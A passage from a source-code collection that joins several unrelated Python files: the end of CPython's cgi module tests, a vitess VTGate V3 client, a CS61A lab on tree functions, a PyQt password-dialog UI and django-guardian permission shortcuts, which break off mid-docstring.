# non-GET/HEAD requests
class TestReadlineFile:
def __init__(self, file):
self.file = file
self.numcalls = 0
def readline(self, size=None):
self.numcalls += 1
if size:
return self.file.readline(size)
else:
return self.file.readline()
def __getattr__(self, name):
file = self.__dict__['file']
a = getattr(file, name)
if not isinstance(a, int):
setattr(self, name, a)
return a
f = TestReadlineFile(tempfile.TemporaryFile("wb+"))
self.addCleanup(f.close)
f.write(b'x' * 256 * 1024)
f.seek(0)
env = {'REQUEST_METHOD':'PUT'}
fs = cgi.FieldStorage(fp=f, environ=env)
self.addCleanup(fs.file.close)
# if we're not chunking properly, readline is only called twice
# (by read_binary); if we are chunking properly, it will be called 5 times
# as long as the chunksize is 1 << 16.
self.assertTrue(f.numcalls > 2)
f.close()
def test_fieldstorage_multipart(self):
#Test basic FieldStorage multipart parsing
env = {
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary={}'.format(BOUNDARY),
'CONTENT_LENGTH': '558'}
fp = BytesIO(POSTDATA.encode('latin-1'))
fs = cgi.FieldStorage(fp, environ=env, encoding="latin-1")
self.assertEqual(len(fs.list), 4)
expect = [{'name':'id', 'filename':None, 'value':'1234'},
{'name':'title', 'filename':None, 'value':''},
{'name':'file', 'filename':'test.txt', 'value':b'Testing 123.\n'},
{'name':'submit', 'filename':None, 'value':' Add '}]
for x in range(len(fs.list)):
for k, exp in expect[x].items():
got = getattr(fs.list[x], k)
self.assertEqual(got, exp)
def test_fieldstorage_multipart_non_ascii(self):
#Test basic FieldStorage multipart parsing
env = {'REQUEST_METHOD':'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary={}'.format(BOUNDARY),
'CONTENT_LENGTH':'558'}
for encoding in ['iso-8859-1','utf-8']:
fp = BytesIO(POSTDATA_NON_ASCII.encode(encoding))
fs = cgi.FieldStorage(fp, environ=env,encoding=encoding)
self.assertEqual(len(fs.list), 1)
expect = [{'name':'id', 'filename':None, 'value':'\xe7\xf1\x80'}]
for x in range(len(fs.list)):
for k, exp in expect[x].items():
got = getattr(fs.list[x], k)
self.assertEqual(got, exp)
_qs_result = {
'key1': 'value1',
'key2': ['value2x', 'value2y'],
'key3': 'value3',
'key4': 'value4'
}
def testQSAndUrlEncode(self):
data = "key2=value2x&key3=value3&key4=value4"
environ = {
'CONTENT_LENGTH': str(len(data)),
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'QUERY_STRING': 'key1=value1&key2=value2y',
'REQUEST_METHOD': 'POST',
}
v = gen_result(data, environ)
self.assertEqual(self._qs_result, v)
def testQSAndFormData(self):
data = """---123
Content-Disposition: form-data; name="key2"
value2y
---123
Content-Disposition: form-data; name="key3"
value3
---123
Content-Disposition: form-data; name="key4"
value4
---123--
"""
environ = {
'CONTENT_LENGTH': str(len(data)),
'CONTENT_TYPE': 'multipart/form-data; boundary=-123',
'QUERY_STRING': 'key1=value1&key2=value2x',
'REQUEST_METHOD': 'POST',
}
v = gen_result(data, environ)
self.assertEqual(self._qs_result, v)
def testQSAndFormDataFile(self):
data = """---123
Content-Disposition: form-data; name="key2"
value2y
---123
Content-Disposition: form-data; name="key3"
value3
---123
Content-Disposition: form-data; name="key4"
value4
---123
Content-Disposition: form-data; name="upload"; filename="fake.txt"
Content-Type: text/plain
this is the content of the fake file
---123--
"""
environ = {
'CONTENT_LENGTH': str(len(data)),
'CONTENT_TYPE': 'multipart/form-data; boundary=-123',
'QUERY_STRING': 'key1=value1&key2=value2x',
'REQUEST_METHOD': 'POST',
}
result = self._qs_result.copy()
result.update({
'upload': b'this is the content of the fake file\n'
})
v = gen_result(data, environ)
self.assertEqual(result, v)
def test_deprecated_parse_qs(self):
# this func is moved to urllib.parse, this is just a sanity check
with check_warnings(('cgi.parse_qs is deprecated, use urllib.parse.'
'parse_qs instead', DeprecationWarning)):
self.assertEqual({'a': ['A1'], 'B': ['B3'], 'b': ['B2']},
cgi.parse_qs('a=A1&b=B2&B=B3'))
def test_deprecated_parse_qsl(self):
# this func is moved to urllib.parse, this is just a sanity check
with check_warnings(('cgi.parse_qsl is deprecated, use urllib.parse.'
'parse_qsl instead', DeprecationWarning)):
self.assertEqual([('a', 'A1'), ('b', 'B2'), ('B', 'B3')],
cgi.parse_qsl('a=A1&b=B2&B=B3'))
def test_parse_header(self):
self.assertEqual(
cgi.parse_header("text/plain"),
("text/plain", {}))
self.assertEqual(
cgi.parse_header("text/vnd.just.made.this.up ; "),
("text/vnd.just.made.this.up", {}))
self.assertEqual(
cgi.parse_header("text/plain;charset=us-ascii"),
("text/plain", {"charset": "us-ascii"}))
self.assertEqual(
cgi.parse_header('text/plain ; charset="us-ascii"'),
("text/plain", {"charset": "us-ascii"}))
self.assertEqual(
cgi.parse_header('text/plain ; charset="us-ascii"; another=opt'),
("text/plain", {"charset": "us-ascii", "another": "opt"}))
self.assertEqual(
cgi.parse_header('attachment; filename="silly.txt"'),
("attachment", {"filename": "silly.txt"}))
self.assertEqual(
cgi.parse_header('attachment; filename="strange;name"'),
("attachment", {"filename": "strange;name"}))
self.assertEqual(
cgi.parse_header('attachment; filename="strange;name";size=123;'),
("attachment", {"filename": "strange;name", "size": "123"}))
BOUNDARY = "---------------------------721837373350705526688164684"
POSTDATA = """-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="id"
1234
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="title"
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
Testing 123.
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="submit"
Add\x20
-----------------------------721837373350705526688164684--
"""
POSTDATA_NON_ASCII = """-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="id"
\xe7\xf1\x80
-----------------------------721837373350705526688164684
"""
def test_main():
run_unittest(CgiTests)
if __name__ == '__main__':
test_main()
|
yangzhongj/vitess | refs/heads/master | py/vtdb/vtgatev3.py | 5 | # Copyright 2013 Google Inc. All Rights Reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
from itertools import izip
import logging
import re
from net import bsonrpc
from net import gorpc
from vtdb import cursorv3
from vtdb import dbexceptions
from vtdb import field_types
from vtdb import vtdb_logger
_errno_pattern = re.compile(r'\(errno (\d+)\)')
def log_exception(method):
"""Decorator for logging the exception from vtgatev2.
The convert_exception method interprets and recasts the exceptions
raised by lower-layer. The inner function calls the appropriate vtdb_logger
method based on the exception raised.
Args:
method: Method that takes exc, *args, where exc is an exception raised
by calling code, args are additional args for the exception.
Returns:
Decorated method.
"""
def _log_exception(exc, *args):
logger_object = vtdb_logger.get_logger()
new_exception = method(exc, *args)
if isinstance(new_exception, dbexceptions.IntegrityError):
logger_object.integrity_error(new_exception)
else:
logger_object.vtgatev2_exception(new_exception)
return new_exception
return _log_exception
def handle_app_error(exc_args):
msg = str(exc_args[0]).lower()
if msg.startswith('request_backlog'):
return dbexceptions.RequestBacklog(exc_args)
match = _errno_pattern.search(msg)
if match:
mysql_errno = int(match.group(1))
# Prune the error message to truncate the query string
# returned by mysql as it contains bind variables.
if mysql_errno == 1062:
parts = _errno_pattern.split(msg)
pruned_msg = msg[:msg.find(parts[2])]
new_args = (pruned_msg,) + tuple(exc_args[1:])
return dbexceptions.IntegrityError(new_args)
return dbexceptions.DatabaseError(exc_args)
@log_exception
def convert_exception(exc, *args):
new_args = exc.args + args
if isinstance(exc, gorpc.TimeoutError):
return dbexceptions.TimeoutError(new_args)
elif isinstance(exc, gorpc.AppError):
return handle_app_error(new_args)
elif isinstance(exc, gorpc.ProgrammingError):
return dbexceptions.ProgrammingError(new_args)
elif isinstance(exc, gorpc.GoRpcError):
return dbexceptions.FatalError(new_args)
return exc
def _create_req(sql, new_binds, tablet_type, not_in_transaction):
new_binds = field_types.convert_bind_vars(new_binds)
req = {
'Sql': sql,
'BindVariables': new_binds,
'TabletType': tablet_type,
'NotInTransaction': not_in_transaction,
}
return req
class VTGateConnection(object):
"""This utilizes the V3 API of VTGate."""
def __init__(self, addr, timeout, user=None, password=None,
keyfile=None, certfile=None):
# TODO: Merge. This is very similar to vtgatev2.
self.session = None
self.addr = addr
self.user = user
self.password = password
self.keyfile = keyfile
self.certfile = certfile
self.timeout = timeout
self.client = self._create_client()
self.logger_object = vtdb_logger.get_logger()
def _create_client(self):
# TODO: Merge. This is very similar to vtgatev2.
return bsonrpc.BsonRpcClient(
self.addr, self.timeout, self.user, self.password,
keyfile=self.keyfile, certfile=self.certfile)
def _get_client(self):
"""Get current client or create a new one and connect."""
# TODO: Merge. This is very similar to vtgatev2.
if not self.client:
self.client = self._create_client()
try:
self.client.dial()
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
return self.client
def __str__(self):
return '<VTGateConnection %s >' % self.addr
def dial(self):
# TODO: Merge. This is very similar to vtgatev2.
try:
if not self.is_closed():
self.close()
self._get_client().dial()
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def close(self):
# TODO: Merge. This is very similar to vtgatev2.
if self.session:
self.rollback()
if self.client:
self.client.close()
def is_closed(self):
# TODO: Merge. This is very similar to vtgatev2.
return not self.client or self.client.is_closed()
def cursor(self, *pargs, **kwargs):
cursorclass = kwargs.pop('cursorclass', None) or cursorv3.Cursor
return cursorclass(self, *pargs, **kwargs)
def begin(self, effective_caller_id=None):
_ = effective_caller_id # TODO: Pass effective_caller_id through.
try:
response = self._get_client().call('VTGate.Begin', None)
self.session = response.reply
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def commit(self):
try:
session = self.session
self.session = None
self._get_client().call('VTGate.Commit', session)
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def rollback(self):
try:
session = self.session
self.session = None
self._get_client().call('VTGate.Rollback', session)
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
def _add_session(self, req):
if self.session:
req['Session'] = self.session
def _update_session(self, response):
if response.reply.get('Session'):
self.session = response.reply['Session']
def _execute(
self, sql, bind_variables, tablet_type, not_in_transaction=False):
req = _create_req(sql, bind_variables, tablet_type, not_in_transaction)
self._add_session(req)
fields = []
conversions = []
results = []
rowcount = 0
lastrowid = 0
try:
response = self._get_client().call('VTGate.Execute', req)
self._update_session(response)
reply = response.reply
if response.reply.get('Error'):
raise gorpc.AppError(response.reply['Error'], 'VTGate.Execute')
if reply.get('Result'):
res = reply['Result']
for field in res['Fields']:
fields.append((field['Name'], field['Type']))
conversions.append(field_types.conversions.get(field['Type']))
for row in res['Rows']:
results.append(tuple(_make_row(row, conversions)))
rowcount = res['RowsAffected']
lastrowid = res['InsertId']
except gorpc.GoRpcError as e:
self.logger_object.log_private_data(bind_variables)
raise convert_exception(e, str(self), sql)
except Exception:
logging.exception('gorpc low-level error')
raise
return results, rowcount, lastrowid, fields
def _execute_batch(
self, sql_list, bind_variables_list, tablet_type, as_transaction):
query_list = []
for sql, bind_vars in zip(sql_list, bind_variables_list):
query = {}
query['Sql'] = sql
query['BindVariables'] = field_types.convert_bind_vars(bind_vars)
query_list.append(query)
rowsets = []
try:
req = {
'Queries': query_list,
'TabletType': tablet_type,
'AsTransaction': as_transaction,
}
self._add_session(req)
response = self._get_client().call('VTGate.ExecuteBatch', req)
self._update_session(response)
if response.reply.get('Error'):
raise gorpc.AppError(response.reply['Error'], 'VTGate.ExecuteBatch')
for reply in response.reply['List']:
fields = []
conversions = []
results = []
rowcount = 0
for field in reply['Fields']:
fields.append((field['Name'], field['Type']))
conversions.append(field_types.conversions.get(field['Type']))
for row in reply['Rows']:
results.append(tuple(_make_row(row, conversions)))
rowcount = reply['RowsAffected']
lastrowid = reply['InsertId']
rowsets.append((results, rowcount, lastrowid, fields))
except gorpc.GoRpcError as e:
self.logger_object.log_private_data(bind_variables_list)
raise convert_exception(e, str(self), sql_list)
except Exception:
logging.exception('gorpc low-level error')
raise
return rowsets
def _stream_execute(
self, sql, bind_variables, tablet_type, not_in_transaction=False):
req = _create_req(sql, bind_variables, tablet_type, not_in_transaction)
self._add_session(req)
rpc_client = self._get_client()
stream_fields = []
stream_conversions = []
try:
rpc_client.stream_call('VTGate.StreamExecute', req)
first_response = rpc_client.stream_next()
reply = first_response.reply['Result']
for field in reply['Fields']:
stream_fields.append((field['Name'], field['Type']))
stream_conversions.append(
field_types.conversions.get(field['Type']))
except gorpc.GoRpcError as e:
self.logger_object.log_private_data(bind_variables)
raise convert_exception(e, str(self), sql)
except Exception:
logging.exception('gorpc low-level error')
raise
# Take the BsonRpcClient from VTGateConnection. The row_generator
# will manage the BsonRpcClient. This VTGateConnection will connect
# to a new client if needed.
self.client = None
def row_generator():
# TODO: Merge. This is very similar to vtgatev2.
try:
while True:
try:
stream_result = rpc_client.stream_next()
if stream_result is None:
break
# A session message, if any comes separately with no rows.
# I am not sure if we can ignore this.
if stream_result.reply.get('Session'):
self.session = stream_result.reply['Session']
else:
for result_item in stream_result.reply['Result']['Rows']:
yield tuple(_make_row(result_item, stream_conversions))
except gorpc.GoRpcError as e:
raise convert_exception(e, str(self))
except Exception:
logging.exception('gorpc low-level error')
raise
finally:
rpc_client.close()
return row_generator(), stream_fields
def _make_row(row, conversions):
# TODO: Merge. This is very similar to vtgatev2.
converted_row = []
for conversion_func, field_data in izip(conversions, row):
if field_data is None:
v = None
elif conversion_func:
v = conversion_func(field_data)
else:
v = field_data
converted_row.append(v)
return converted_row
def connect(*pargs, **kwargs):
conn = VTGateConnection(*pargs, **kwargs)
conn.dial()
return conn
|
tavaresdong/courses-notes | refs/heads/master | ucb_cs61A/lab/lab05/lab05.py | 3 | ## Trees ##
# Q4
def make_pytunes(username):
"""Return a pyTunes tree as shown in the diagram with USERNAME as the value
of the root.
>>> pytunes = make_pytunes('i_love_music')
>>> print_tree(pytunes)
i_love_music
pop
justin bieber
single
what do you mean?
2015 pop mashup
trance
darude
sandstorm
"""
"*** YOUR CODE HERE ***"
pytune = tree(username, [tree('pop', [tree('justin bieber', [tree('single', \
[tree('what do you mean?')])]), tree('2015 pop mashup')]), tree('trance', [tree('darude', \
[tree('sandstorm')])])])
return pytune
# Q5
def num_songs(t):
"""Return the number of songs in the pyTunes tree, t.
>>> pytunes = make_pytunes('i_love_music')
>>> num_songs(pytunes)
3
"""
"*** YOUR CODE HERE ***"
if is_leaf(t):
return 1
else:
sum_songs = 0
for subt in branches(t):
sum_songs += num_songs(subt)
return sum_songs
# better : sum([num_songs(b) for b in branches(t)])
# Q6
def find(t, target):
"""Returns True if t contains a node with the value TARGET and False
otherwise.
>>> my_account = tree('kpop_king',
... [tree('korean',
... [tree('gangnam style'),
... tree('wedding dress')]),
... tree('pop',
... [tree('t-swift',
... [tree('blank space')]),
... tree('uptown funk'),
... tree('see you again')])])
>>> find(my_account, 'korean')
True
>>> find(my_account, 'blank space')
True
>>> find(my_account, 'bad blood')
False
"""
"*** YOUR CODE HERE ***"
if root(t) == target:
return True
else:
for b in branches(t):
if find(b, target):
return True
return False
# Q7
def add_song(t, song, category):
"""Returns a new tree with SONG added to CATEGORY. Assume the CATEGORY
already exists.
>>> indie_tunes = tree('indie_tunes',
... [tree('indie',
... [tree('vance joy',
... [tree('riptide')])])])
>>> new_indie = add_song(indie_tunes, 'georgia', 'vance joy')
>>> print_tree(new_indie)
indie_tunes
indie
vance joy
riptide
georgia
"""
"*** YOUR CODE HERE ***"
if root(t) == category and (not is_leaf(t)):
return tree(root(t), branches(t) + [tree(song)])
else:
new_branches = [add_song(b, song, category) for b in branches(t)]
return tree(root(t), new_branches)
# Q8
def delete(t, target):
"""Returns the tree that results from deleting TARGET from t. If TARGET is
a category, delete everything inside of it.
>>> my_account = tree('kpop_king',
... [tree('korean',
... [tree('gangnam style'),
... tree('wedding dress')]),
... tree('pop',
... [tree('t-swift',
... [tree('blank space')]),
... tree('uptown funk'),
... tree('see you again')])])
>>> new = delete(my_account, 'pop')
>>> print_tree(new)
kpop_king
korean
gangnam style
wedding dress
"""
"*** YOUR CODE HERE ***"
remain_branches = []
for b in branches(t):
if root(b) != target:
remain_branches += [delete(b, target)]
return tree(root(t), remain_branches)
# ADT
def tree(root, branches=[]):
for branch in branches:
assert is_tree(branch), 'branches must be trees'
return [root] + list(branches)
def root(tree):
return tree[0]
def branches(tree):
return tree[1:]
def is_tree(tree):
if type(tree) != list or len(tree) < 1:
return False
for branch in branches(tree):
if not is_tree(branch):
return False
return True
def is_leaf(tree):
return not branches(tree)
numbers = tree(1, [tree(2), tree(3, [tree(4), tree(5)]), tree(6, [tree(7)])])
def print_tree(t, indent=0):
"""Print a representation of this tree in which each node is
indented by two spaces times its depth from the root.
>>> print_tree(tree(1))
1
>>> print_tree(tree(1, [tree(2)]))
1
2
>>> print_tree(numbers)
1
2
3
4
5
6
7
"""
print(' ' * indent + str(root(t)))
for branch in branches(t):
print_tree(branch, indent + 1)
|
lalinsky/picard | refs/heads/master | picard/ui/ui_passworddialog.py | 5 | # -*- coding: utf-8 -*-
# Automatically generated - don't edit.
# Use `python setup.py build_ui` to update it.
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_PasswordDialog(object):
def setupUi(self, PasswordDialog):
PasswordDialog.setObjectName(_fromUtf8("PasswordDialog"))
PasswordDialog.setWindowModality(QtCore.Qt.WindowModal)
PasswordDialog.resize(378, 246)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(PasswordDialog.sizePolicy().hasHeightForWidth())
PasswordDialog.setSizePolicy(sizePolicy)
self.verticalLayout = QtGui.QVBoxLayout(PasswordDialog)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.info_text = QtGui.QLabel(PasswordDialog)
self.info_text.setText(_fromUtf8(""))
self.info_text.setWordWrap(True)
self.info_text.setObjectName(_fromUtf8("info_text"))
self.verticalLayout.addWidget(self.info_text)
spacerItem = QtGui.QSpacerItem(20, 60, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.label = QtGui.QLabel(PasswordDialog)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.username = QtGui.QLineEdit(PasswordDialog)
self.username.setWindowModality(QtCore.Qt.NonModal)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.username.sizePolicy().hasHeightForWidth())
self.username.setSizePolicy(sizePolicy)
self.username.setObjectName(_fromUtf8("username"))
self.verticalLayout.addWidget(self.username)
self.label_2 = QtGui.QLabel(PasswordDialog)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.password = QtGui.QLineEdit(PasswordDialog)
self.password.setEchoMode(QtGui.QLineEdit.Password)
self.password.setObjectName(_fromUtf8("password"))
self.verticalLayout.addWidget(self.password)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem1)
self.buttonbox = QtGui.QDialogButtonBox(PasswordDialog)
self.buttonbox.setOrientation(QtCore.Qt.Horizontal)
self.buttonbox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonbox.setObjectName(_fromUtf8("buttonbox"))
self.verticalLayout.addWidget(self.buttonbox)
self.retranslateUi(PasswordDialog)
QtCore.QObject.connect(self.buttonbox, QtCore.SIGNAL(_fromUtf8("rejected()")), PasswordDialog.reject)
QtCore.QMetaObject.connectSlotsByName(PasswordDialog)
def retranslateUi(self, PasswordDialog):
PasswordDialog.setWindowTitle(_("Authentication required"))
self.label.setText(_("Username:"))
self.label_2.setText(_("Password:"))
|
olevinsky/django-guardian | refs/heads/master | guardian/shortcuts.py | 9 | """
Convenient shortcuts to manage or check object permissions.
"""
from django.contrib.auth.models import Permission, User, Group
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import Q
from django.shortcuts import _get_queryset
from guardian.core import ObjectPermissionChecker
from guardian.exceptions import MixedContentTypeError
from guardian.exceptions import WrongAppError
from guardian.models import UserObjectPermission, GroupObjectPermission
from guardian.utils import get_identity
from itertools import groupby
def assign(perm, user_or_group, obj=None):
"""
Assigns permission to user/group and object pair.
:param perm: proper permission for given ``obj``, as string (in format:
``app_label.codename`` or ``codename``). If ``obj`` is not given, must
be in format ``app_label.codename``.
:param user_or_group: instance of ``User``, ``AnonymousUser`` or ``Group``;
passing any other object would raise
``guardian.exceptions.NotUserNorGroup`` exception
:param obj: persisted Django's ``Model`` instance or ``None`` if assigning
global permission. Default is ``None``.
We can assign permission for ``Model`` instance for specific user:
>>> from django.contrib.sites.models import Site
>>> from django.contrib.auth.models import User, Group
>>> from guardian.shortcuts import assign
>>> site = Site.objects.get_current()
>>> user = User.objects.create(username='joe')
>>> assign("change_site", user, site)
<UserObjectPermission: example.com | joe | change_site>
>>> user.has_perm("change_site", site)
True
... or we can assign permission for group:
>>> group = Group.objects.create(name='joe-group')
>>> user.groups.add(group)
>>> assign("delete_site", group, site)
<GroupObjectPermission: example.com | joe-group | delete_site>
>>> user.has_perm("delete_site", site)
True
**Global permissions**
This function may also be used to assign standard, *global* permissions if
``obj`` parameter is omitted. Added Permission would be returned in that
case:
>>> assign("sites.change_site", user)
<Permission: sites | site | Can change site>
"""
user, group = get_identity(user_or_group)
# If obj is None we try to operate on global permissions
if obj is None:
try:
app_label, codename = perm.split('.', 1)
except ValueError:
raise ValueError("For global permissions, first argument must be in"
" format: 'app_label.codename' (is %r)" % perm)
perm = Permission.objects.get(content_type__app_label=app_label,
codename=codename)
if user:
user.user_permissions.add(perm)
return perm
if group:
group.permissions.add(perm)
return perm
perm = perm.split('.')[-1]
if user:
return UserObjectPermission.objects.assign(perm, user, obj)
if group:
return GroupObjectPermission.objects.assign(perm, group, obj)
def remove_perm(perm, user_or_group=None, obj=None):
"""
Removes permission from user/group and object pair.
:param perm: proper permission for given ``obj``, as string (in format:
``app_label.codename`` or ``codename``). If ``obj`` is not given, must
be in format ``app_label.codename``.
:param user_or_group: instance of ``User``, ``AnonymousUser`` or ``Group``;
passing any other object would raise
``guardian.exceptions.NotUserNorGroup`` exception
:param obj: persisted Django's ``Model`` instance or ``None`` if assigning
global permission. Default is ``None``.
"""
user, group = get_identity(user_or_group)
if obj is None:
try:
app_label, codename = perm.split('.', 1)
except ValueError:
raise ValueError("For global permissions, first argument must be in"
" format: 'app_label.codename' (is %r)" % perm)
perm = Permission.objects.get(content_type__app_label=app_label,
codename=codename)
if user:
user.user_permissions.remove(perm)
return
elif group:
group.permissions.remove(perm)
return
perm = perm.split('.')[-1]
if user:
UserObjectPermission.objects.remove_perm(perm, user, obj)
if group:
GroupObjectPermission.objects.remove_perm(perm, group, obj)
def get_perms(user_or_group, obj):
"""
Returns permissions for given user/group and object pair, as list of
strings.
"""
check = ObjectPermissionChecker(user_or_group)
return check.get_perms(obj)
def get_perms_for_model(cls):
"""
Returns queryset of all Permission objects for the given class. It is
possible to pass Model as class or instance.
"""
if isinstance(cls, str):
app_label, model_name = cls.split('.')
model = models.get_model(app_label, model_name)
else:
model = cls
ctype = ContentType.objects.get_for_model(model)
return Permission.objects.filter(content_type=ctype)
def get_users_with_perms(obj, attach_perms=False, with_superusers=False,
with_group_users=True):
"""
Returns queryset of all ``User`` objects with *any* object permissions for
the given ``obj``.
:param obj: persisted Django's ``Model`` instance
:param attach_perms: Default: ``False``. If set to ``True`` result would be
dictionary of ``User`` instances with permissions' codenames list as
values. This would fetch users eagerly!
:param with_superusers: Default: ``False``. If set to ``True`` result would
contain all superusers.
:param with_group_users: Default: ``True``. If set to ``False`` result would
**not** contain those users who have only group permissions for given
``obj``.
Example::
>>> from django.contrib.auth.models import User
>>> from django.contrib.flatpages.models import FlatPage
>>> from guardian.shortcuts import assign, get_users_with_perms
>>>
>>> page = FlatPage.objects.create(title='Some page', path='/some/page/')
>>> joe = User.objects.create_user('joe', '[email protected]', 'joesecret')
>>> assign('change_flatpage', joe, page)
>>>
>>> get_users_with_perms(page)
[<User: joe>]
>>>
>>> get_users_with_perms(page, attach_perms=True)
{<User: joe>: [u'change_flatpage']}
"""
ctype = ContentType.objects.get_for_model(obj)
if not attach_perms:
# It's much easier without attached perms so we do it first if that is
# the case
qset = Q(
userobjectpermission__content_type=ctype,
userobjectpermission__object_pk=obj.pk)
if with_group_users:
qset = qset | Q(
groups__groupobjectpermission__content_type=ctype,
groups__groupobjectpermission__object_pk=obj.pk,
)
if with_superusers:
qset = qset | Q(is_superuser=True)
return User.objects.filter(qset).distinct()
else:
# TODO: Do not hit db for each user!
users = {}
for user in get_users_with_perms(obj,
with_group_users=with_group_users):
users[user] = get_perms(user, obj)
return users
def get_groups_with_perms(obj, attach_perms=False):
"""
Returns queryset of all ``Group`` objects with *any* object permissions for
the given ``obj``.
:param obj: persisted Django's ``Model`` instance
:param attach_perms: Default: ``False``. If set to ``True`` result would be
dictionary of ``Group`` instances with permissions' codenames list as
values. This would fetch groups eagerly!
Example::
>>> from django.contrib.auth.models import Group
>>> from django.contrib.flatpages.models import FlatPage
>>> from guardian.shortcuts import assign, get_groups_with_perms
>>>
>>> page = FlatPage.objects.create(title='Some page', path='/some/page/')
>>> admins = Group.objects.create(name='Admins')
>>> assign('change_flatpage', group, page)
>>>
>>> get_groups_with_perms(page)
[<Group: admins>]
>>>
>>> get_groups_with_perms(page, attach_perms=True)
{<Group: admins>: [u'change_flatpage']}
"""
ctype = ContentType.objects.get_for_model(obj)
if not attach_perms:
# It's much easier without attached perms so we do it first if that is
# the case
groups = Group.objects\
.filter(
groupobjectpermission__content_type=ctype,
groupobjectpermission__object_pk=obj.pk,
)\
.distinct()
return groups
else:
# TODO: Do not hit db for each group!
groups = {}
for group in get_groups_with_perms(obj):
if not group in groups:
groups[group] = get_perms(group, obj)
return groups
def get_objects_for_user(user, perms, klass=None, use_groups=True, any_perm=False):
"""
Returns queryset of objects for which a given ``user`` has *all*
permissions present at ``perms``.
:param user: ``User`` instance for which objects would be returned
:param perms: single permission string, or sequence of permission strings
which should be checked.
If ``klass`` parameter is not given, those should be full permission
names rather than only codenames (i.e. ``auth.change_user``). If more than
one permission is present within sequence, their content type **must** be
the same or ``MixedContentTypeError`` exception would be raised.
:param klass: may be a Model, Manager or QuerySet object. If not given
this parameter would be computed based on given ``params``.
:param use_groups: if ``False``, wouldn't check user's groups object
permissions. Default is ``True``.
:param any_perm: if True, any of permission in sequence is accepted
:raises MixedContentTypeError: when computed content type for ``perms``
and/or ``klass`` clashes.
:raises WrongAppError: if cannot compute app label for given ``perms``/
``klass``.
Example::
>>> from guardian.shortcuts import get_objects_for_user
>>> joe = User.objects.get(username='joe')
>>> get_objects_for_user(joe, 'auth.change_group')
[]
>>> from guardian.shortcuts import assign
>>> group = Group.objects.create('some group')
>>> assign('auth.change_group', joe, group)
>>> get_objects_for_user(joe, 'auth.change_group')
[<Group some group>]
The permission string can also be an iterable. Continuing with the previous example:
>>> get_objects_for_user(joe, ['auth.change_group', 'auth.delete_group'])
[]
>>> get_objects_for_user(joe, ['auth.change_group', 'auth.delete_group'], any_perm=True)
[<Group some group>]
>>> assign('auth.delete_group', joe, group)
>>> get_objects_for_user(joe, ['auth.change_group', 'auth.delete_group'])
[<Group some group>]
"""
if isinstance(perms, basestring):
perms = [perms]
ctype = None
app_label = None
codenames = set()
# Compute codenames set and ctype if possible
for perm in perms:
if '.' in perm:
new_app_label, codename = perm.split('.', 1)
if app_label is not None and app_label != new_app_label:
raise MixedContentTypeError("Given perms must have same app "
"label (%s != %s)" % (app_label, new_app_label))
else:
app_label = new_app_label
else:
codename = perm
codenames.add(codename)
if app_label is not None:
new_ctype = ContentType.objects.get(app_label=app_label,
permission__codename=codename)
if ctype is not None and ctype != new_ctype:
raise MixedContentTypeError("ContentType was once computed "
"to be %s and another one %s" % (ctype, new_ctype))
else:
ctype = new_ctype
# Compute queryset and ctype if still missing
if ctype is None and klass is None:
raise WrongAppError("Cannot determine content type")
elif ctype is None and klass is not None:
queryset = _get_queryset(klass)
ctype = ContentType.objects.get_for_model(queryset.model)
elif ctype is not None and klass is None:
queryset = _get_queryset(ctype.model_class())
else:
queryset = _get_queryset(klass)
if ctype.model_class() != queryset.model:
raise MixedContentTypeError("Content type for given perms and "
"klass differs")
# At this point, we should have both ctype and queryset and they should
# match which means: ctype.model_class() == queryset.model
# we should also have ``codenames`` list
# First check if user is superuser and if so, return queryset immediately
if user.is_superuser:
return queryset
# Now we should extract list of pk values for which we would filter queryset
user_obj_perms = UserObjectPermission.objects\
.filter(user=user)\
.filter(permission__content_type=ctype)\
.filter(permission__codename__in=codenames)\
.values_list('object_pk', 'permission__codename')
data = list(user_obj_perms)
if use_groups:
groups_obj_perms = GroupObjectPermission.objects\
.filter(group__user=user)\
.filter(permission__content_type=ctype)\
.filter(permission__codename__in=codenames)\
.values_list('object_pk', 'permission__codename')
data += list(groups_obj_perms)
keyfunc = lambda t: t[0] # sorting/grouping by pk (first in result tuple)
data = sorted(data, key=keyfunc)
pk_list = []
for pk, group in groupby(data, keyfunc):
obj_codenames = set((e[1] for e in group))
if any_perm or codenames.issubset(obj_codenames):
pk_list.append(pk)
objects = queryset.filter(pk__in=pk_list)
return objects
def get_objects_for_group(group, perms, klass=None, any_perm=False):
"""
Returns queryset of objects for which a given ``group`` has *all*
permissions present at ``perms``.
:param group: ``Group`` instance for which objects would be returned.
:param perms: single permission string, or sequence of permission strings
which should be checked.
